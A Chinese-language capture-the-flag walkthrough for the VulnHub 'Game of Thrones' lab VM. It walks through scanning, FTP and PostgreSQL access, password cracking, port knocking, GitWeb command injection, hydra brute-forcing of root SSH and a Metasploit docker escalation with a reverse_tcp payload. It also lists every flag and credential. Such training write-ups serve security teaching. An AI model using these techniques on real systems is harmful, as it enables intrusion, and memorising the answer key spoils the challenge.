Game of Thrones CTF 靶机实战教学文档<\/h1>

靶机概述<\/h2>

主题：权利的游戏（Game of Thrones）<\/li>
难度：中高水平<\/li>
目标：获得七国的flag和四个额外flag（三个secret flag和一个final flag）<\/li>

特点：需要结合《权力的游戏》相关知识，地图是关键信息来源<\/li> <\/ul>

环境配置<\/h2>

靶机下载地址：https:\/\/www.vulnhub.com\/entry\/game-of-thrones-ctf-1,201\/<\/li>

网络配置：VMware NAT模式

靶机IP：192.168.128.137（自动获取）<\/li>

攻击机IP：192.168.128.106<\/li> <\/ul> <\/li> <\/ol>

信息收集<\/h2>

初始扫描<\/h3>

nmap -sV 192.168.128.137
<\/span><\/span><\/code><\/pre>发现开放端口：<\/p>

80端口：Web服务<\/li>
其他端口：后续会动态开放<\/li>
<\/ul>
Web目录扫描<\/h3>
使用dirb扫描Web目录：<\/p>
dirb http:\/\/192.168.128.137\/
<\/span><\/span><\/code><\/pre>发现重要目录：<\/p>

\/robots.txt<\/li>
\/secret-island\/<\/li>
\/direct-access-to-kings-landing\/<\/li>
\/the-tree\/<\/li>
\/h\/i\/d\/d\/e\/n\/<\/li>
<\/ul>
漏洞利用路径<\/h2>
第一阶段：获取初始凭证<\/h3>


访问\/h\/i\/d\/d\/e\/n\/<\/code>目录，在源代码中发现密码：<\/p>
A_verySmallManCanCastAVeryLargeShad0w
<\/code><\/pre>
<\/li>

结合《权游》知识：<\/p>

Dorne领主是Oberyn Martell<\/li>
推测FTP用户名为：oberynmartell<\/li>
<\/ul>
<\/li>
<\/ol>
FTP服务利用<\/h3>


连接FTP：<\/p>
ftp 192.168.128.137
<\/span><\/span>用户名：oberynmartell
<\/span><\/span>密码：A_verySmallManCanCastAVeryLargeShad0w
<\/span><\/span><\/code><\/pre><\/li>

下载文件：<\/p>

hash.txt（包含加密密码）<\/li>
the_wall.txt.nc（加密文件）<\/li>
<\/ul>
<\/li>

破解hash.txt：<\/p>
john --format=<\/span>dynamic_2008 hash.txt
<\/span><\/span><\/code><\/pre><\/li>

解密the_wall.txt.nc：<\/p>
mcrypt -d the_wall.txt.nc
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
第二阶段：域名发现与利用<\/h3>


在解密文件中发现域名：<\/p>
winterfell.7kingdoms.ctf
<\/code><\/pre>
<\/li>

添加到\/etc\/hosts：<\/p>
192.168.128.137 winterfell.7kingdoms.ctf
<\/code><\/pre>
<\/li>

访问网站，使用破解的凭证登录，在源代码中找到：<\/p>

第一个flag：639bae9ac6b3e1a84cebb7b403297b79<\/li>
提示："Timef0rconqu3rs TeXT should be asked to enter into the Iron Islands fortress" - Theon Greyjoy<\/li>
<\/ul>
<\/li>

检查TXT记录：<\/p>
nslookup -q=<\/span>txt Timef0rconqu3rs.7Kingdoms.ctf 192.168.128.137
<\/span><\/span><\/code><\/pre>获得：<\/p>

第二个flag：5e93de3efa544e85dcd6311732d28f95<\/li>
新域名：stormlands.7kingdoms.ctf:10000<\/li>
凭证：aryastark\/N3ddl3_1s_a_g00d_sword#!<\/li>
<\/ul>
<\/li>
<\/ol>
第三阶段：Webmin利用<\/h3>

访问http:\/\/stormlands.7kingdoms.ctf:10000<\/li>
使用文件管理器模块，访问\/home\/aryastark\/flag.txt<\/li>
获得第三个flag：8fc42c6ddf9966db3b09e84365034357<\/li>
<\/ol>
第四阶段：PostgreSQL数据库<\/h3>


连接PostgreSQL：<\/p>
psql -h 192.168.128.137 -U robinarryn -d mountainandthevale
<\/span><\/span><\/code><\/pre><\/li>

查询flag表：<\/p>
SELECT<\/span> *<\/span> FROM<\/span> flag;
<\/span><\/span><\/code><\/pre>获得base64编码的第四个flag：bb3aec0fdcdbc2974890f805c585d432<\/p>
<\/li>

查询其他表：<\/p>
SELECT<\/span> *<\/span> FROM<\/span> aryas_kill_list;
<\/span><\/span>SELECT<\/span> *<\/span> FROM<\/span> braavos_book;
<\/span><\/span><\/code><\/pre>发现rot16编码字符串：<\/p>
Dro wkxi-pkmon qyn gkxdc iye dy mrkxqo iyeb pkmo. Ro gkxdc iye dy snoxdspi kc yxo yp iyeb usvv vscd. Covomd sd lkcon yx drsc lyyu'c vycd zkqo xewlob. Dro nkdklkco dy myxxomd gsvv lo lbkkfyc kxn iyeb zkccgybn gsvv lo: FkvkbWybqrevsc
<\/code><\/pre>
<\/li>

解码rot16获得：<\/p>

数据库名：braavos<\/li>
密码：ValarMorghulis<\/li>
提示：使用kill list中的用户名登录<\/li>
<\/ul>
<\/li>

使用用户名TheRedWomanMelisandre登录，查询temple表获得第五个flag：3f82c41a70a8b0cfec9052252d9fd721<\/p>
<\/li>
<\/ol>
第五阶段：端口敲门与IMAP<\/h3>


使用端口敲门开启143端口：<\/p>
knock 192.168.128.137 3487<\/span> 64535<\/span> 12345<\/span>
<\/span><\/span><\/code><\/pre><\/li>

连接IMAP：<\/p>
nc 192.168.128.137 143<\/span>
<\/span><\/span><\/code><\/pre>获得：<\/p>

第六个flag<\/li>
新端口1337的提示<\/li>
凭证：TywinLannister\/LannisterN3verDie!<\/li>
<\/ul>
<\/li>
<\/ol>
第六阶段：GitWeb命令注入<\/h3>

访问1337端口的GitWeb<\/li>
利用命令注入漏洞：

解码十六进制信息：\/home\/tyrionlannister\/checkpoint.txt<\/li>
获得：

第七个flag：c8d46d341bea4fd5bff866a65ff8aea9<\/li>
SSH凭证：daenerystargaryen\/.Dracarys4thewin<\/li>
<\/ul>
<\/li>
<\/ul>
<\/li>
<\/ol>
第七阶段：SSH访问与提权<\/h3>


SSH登录：<\/p>
ssh daenerystargaryen@192.168.128.137
<\/span><\/span><\/code><\/pre><\/li>

发现文件：<\/p>

digger.txt（字典文件）<\/li>
checkpoint.txt（提示通过172.25.0.2的SSH登录）<\/li>
<\/ul>
<\/li>

使用hydra爆破root密码：<\/p>
hydra -l root -P digger.txt ssh:\/\/localhost:2222
<\/span><\/span><\/code><\/pre>获得密码：Dr4g0nGl4ss!<\/p>
<\/li>

提权后获得：<\/p>

secret flag：a8db1d82db78ed452ba0882fb9554fc9<\/li>
新凭证：branstark\/Th3_Thr33_Ey3d_Raven<\/li>
<\/ul>
<\/li>

使用Metasploit进行Docker提权：<\/p>
use exploit\/linux\/local\/docker_daemon_privilege_escalation
<\/span><\/span>set payload linux\/x86\/meterpreter\/reverse_tcp
<\/span><\/span>run
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
第八阶段：Final Flag<\/h3>


发现文件：<\/p>

final_battle（密码保护的zip）<\/li>
伪代码提示<\/li>
<\/ul>
<\/li>

收集所有secret flag：<\/p>

8bf8854bebe108183caeb845c7676ae4<\/li>
3f82c41a70a8b0cfec9052252d9fd721<\/li>
a8db1d82db78ed452ba0882fb9554fc9<\/li>
<\/ul>
<\/li>

根据伪代码生成密码：<\/p>
45c7676ae4252d9fd7212fb9554fc9
<\/code><\/pre>
<\/li>

解压final_battle获得final flag：<\/p>
8e63dcd86ef9574181a9b6184ed3dde5
<\/code><\/pre>
<\/li>
<\/ol>
所有Flag汇总<\/h2>

Kingdom of the North: 639bae9ac6b3e1a84cebb7b403297b79<\/li>
Iron Islands: 5e93de3efa544e85dcd6311732d28f95<\/li>
Stormlands: 8fc42c6ddf9966db3b09e84365034357<\/li>
Mountain and the Vale: bb3aec0fdcdbc2974890f805c585d432<\/li>
Braavos: 3f82c41a70a8b0cfec9052252d9fd721<\/li>
The Reach: [IMAP中获得的flag]<\/li>
The Westerlands: c8d46d341bea4fd5bff866a65ff8aea9<\/li>
Secret Flag 1: 8bf8854bebe108183caeb845c7676ae4<\/li>
Secret Flag 2: 3f82c41a70a8b0cfec9052252d9fd721<\/li>
Secret Flag 3: a8db1d82db78ed452ba0882fb9554fc9<\/li>
Final Flag: 8e63dcd86ef9574181a9b6184ed3dde5<\/li>
<\/ol>
技术要点总结<\/h2>

信息收集是关键：nmap、dirb、robots.txt<\/li>
密码破解：John the Ripper、mcrypt<\/li>
服务利用：FTP、PostgreSQL、IMAP<\/li>
Web漏洞：命令注入、文件包含<\/li>
提权技术：端口敲门、Docker提权<\/li>
编码识别：base64、rot16<\/li>
密码学：伪代码分析生成密码<\/li>
<\/ol>
参考资源<\/h2>

http:\/\/www.hackingarticles.in\/hack-game-thrones-vm-ctf-challenge\/<\/li>
http:\/\/devloop.users.sourceforge.net\/index.php?article136\/solution-du-ctf-game-of-thrones-1-de-vulnhub<\/li>
<\/ol>

Game of Thrones CTF 靶机实战教学文档<\/h1>

信息收集<\/h2>

漏洞利用路径<\/h2>

参考资源<\/h2> http:\/\/www.hackingarticles.in\/hack-game-thrones-vm-ctf-challenge\/<\/li> http:\/\/devloop.users.sourceforge.net\/index.php?article136\/solution-du-ctf-game-of-thrones-1-de-vulnhub<\/li> <\/ol>

参考资源<\/h2>

http:\/\/www.hackingarticles.in\/hack-game-thrones-vm-ctf-challenge\/<\/li>
http:\/\/devloop.users.sourceforge.net\/index.php?article136\/solution-du-ctf-game-of-thrones-1-de-vulnhub<\/li> <\/ol>